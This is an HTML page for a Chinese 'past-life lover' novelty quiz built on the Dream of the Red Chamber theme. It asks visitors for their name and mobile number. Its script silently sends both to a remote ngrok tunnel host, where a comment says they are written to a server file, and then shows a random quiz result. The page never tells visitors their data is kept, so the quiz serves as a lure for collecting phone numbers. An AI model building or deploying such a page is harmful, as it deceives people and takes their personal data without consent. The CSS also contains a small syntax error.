<!DOCTYPE html>
<html>
 <head>
  <title>你前世的她居然是金陵十二钗的...</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0 user-scalable=no"/>
  <meta http-equiv='Content-type' content='text/html; charset=utf-8'>
  <meta name="Author" content="che">
  <meta name="Keywords" content="前世的她">
  <meta name="Description" content="素材来源网络，仅供学术交流">
 </head>
 <style>
	html:before {
		content: ' ';
		position: fixed;
		z-index: -1;
		top: 0;
		right: 0;
		bottom: 0;
		left: 0;
		background: #FFF url(image/bg.jpg) no-repeat center;
		-webkit-background-size:100% 100%;
		-moz-background-size:100% 100%;
		-o-background-size:100% 100%;
		background-size:100% 100%;
		filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='image/bg.jpg', sizingMethod='scale');
        -ms-filter: "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='image/bg.jpg', sizingMethod='scale')";
	}
	.inputCss {
		display:inline;
		background-color: transparent;
		text-align:center;
		border:0px;
		background:url(image/input.png) no-repeat bottom right;
		-webkit-background-size: 100% 100%;
		-moz-background-size: 100% 100%;
		-o-background-size: 100% 100%;
		background-size: 100% 100%;
		font-family:"楷体";
		margin:10px 100px;
	}
	.container {
		text-align:center;
		margin:100px 0 50px;
	}
	.btn {
		background:url(image/btn.png) 140px 145px; 
		width:140px;
		height:145px;
		margin:0 auto;
	]
 </style>
 
 <body>
	<div class="container">
		<input class="inputCss" id="content" placeholder="输入您的姓名"/>
		<input class="inputCss" id="phone" placeholder="输入手机号码"/>
	</div>
	<div class="btn" onclick="main()"><img id="share" src="image/share.png" style="z-index:-2;"/></div>
 </body>
 <script src="http://libs.baidu.com/jquery/1.11.1/jquery.min.js"></script>
 <script>
	

	// 存储数据 
	var datas = "姓名，号码，";


	$(function(){
		$("#content").focus();
		$("#share").hide();
		//alert(sec[temp%12].name);
	});
	
	// 写入文件至tomcat/bin下
	function main() {
		var content = $("#content").val();
		var phone = $("#phone").val();
		var temp = encodeURI(content).replace(/[^0-9]+/g, ''); // 
		datas = content + "，" + phone + "，";
		$.ajax({
			type: 'get',
			url: "http://che.ngrok.natapp.cn/s2sh-wx/w",
			data: {content:datas} ,
			success: function(e) {
				window.location.reload();
				window.location.href = "page/index.html?key="+temp%12;
			},
			error:function() {
				window.location.reload();
				window.location.href = "page/index.html?key="+temp%12;
			},
			dataType: "jsonp"
		});
	}

 </script>
</html>
